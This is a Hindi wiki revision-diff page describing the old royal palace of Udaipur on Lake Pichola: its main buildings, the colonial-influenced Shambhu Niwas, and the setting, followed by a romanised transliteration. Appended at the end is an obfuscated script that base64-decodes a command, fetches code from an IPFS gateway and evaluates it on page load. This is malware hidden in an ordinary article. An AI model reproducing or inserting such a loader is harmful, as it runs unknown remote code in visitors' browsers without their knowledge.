Difference between revisions of "पुराना राजमहल उदयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
Line 1: Line 1:
 
[[उदयपुर]] [[राजस्थान]] का एक ख़ूबसूरत शहर है। और [[उदयपुर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है। पुराना राजमहल उदयपुर  शहर के दक्षिण की ओर पहाड़ी की ऊँचाई पर [[पिछोला झील]] के किनारे स्थित है। यह जगह बहुत ही सुन्दर और प्राचीन शैली की है। छोटी चित्रशाली, सूरज चौपाड़, पीतमनिवास, मानिकमहल, मोतीमहल, चीनी की चित्रशाली, दिलखुशाल, बाड़ीमहल (अमर-विलास) आदि इस महल की मुख्य इमारतें हैं।
 
[[उदयपुर]] [[राजस्थान]] का एक ख़ूबसूरत शहर है। और [[उदयपुर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है। पुराना राजमहल उदयपुर  शहर के दक्षिण की ओर पहाड़ी की ऊँचाई पर [[पिछोला झील]] के किनारे स्थित है। यह जगह बहुत ही सुन्दर और प्राचीन शैली की है। छोटी चित्रशाली, सूरज चौपाड़, पीतमनिवास, मानिकमहल, मोतीमहल, चीनी की चित्रशाली, दिलखुशाल, बाड़ीमहल (अमर-विलास) आदि इस महल की मुख्य इमारतें हैं।
 
शंभु निवास नाम का महल पुराने महलों के आगे उपनिवेशवादी शैली से प्रभावित होकर बनाया गया है। इसी के पास में शिवनिवास नाम से एक अन्य भव्य महल है। यहाँ की प्राकृतिक सुन्दरता राजमहल शहर के सबसे ऊँचे स्थान पर बनाये जाने के कारण तथा नीचे की तरफ विस्तीर्ण सरोवर होने से देखते ही बनती है।  
 
शंभु निवास नाम का महल पुराने महलों के आगे उपनिवेशवादी शैली से प्रभावित होकर बनाया गया है। इसी के पास में शिवनिवास नाम से एक अन्य भव्य महल है। यहाँ की प्राकृतिक सुन्दरता राजमहल शहर के सबसे ऊँचे स्थान पर बनाये जाने के कारण तथा नीचे की तरफ विस्तीर्ण सरोवर होने से देखते ही बनती है।  
 
+
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक=प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}
 
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:उदयपुर]][[Category:उदयपुर_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]]__INDEX__
 
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:उदयपुर]][[Category:उदयपुर_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]]__INDEX__

Revision as of 09:56, 2 October 2010

udayapur rajasthan ka ek khoobasoorat shahar hai. aur udayapur paryatan ka sabase akarshak sthal mana jata hai. purana rajamahal udayapur shahar ke dakshin ki or paha di ki ooanchaee par pichhola jhil ke kinare sthit hai. yah jagah bahut hi sundar aur prachin shaili ki hai. chhoti chitrashali, sooraj chaupa d, pitamanivas, manikamahal, motimahal, chini ki chitrashali, dilakhushal, ba dimahal (amar-vilas) adi is mahal ki mukhy imaratean haian. shanbhu nivas nam ka mahal purane mahaloan ke age upaniveshavadi shaili se prabhavit hokar banaya gaya hai. isi ke pas mean shivanivas nam se ek any bhavy mahal hai. yahaan ki prakritik sundarata rajamahal shahar ke sabase ooanche sthan par banaye jane ke karan tatha niche ki taraph vistirn sarovar hone se dekhate hi banati hai.

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>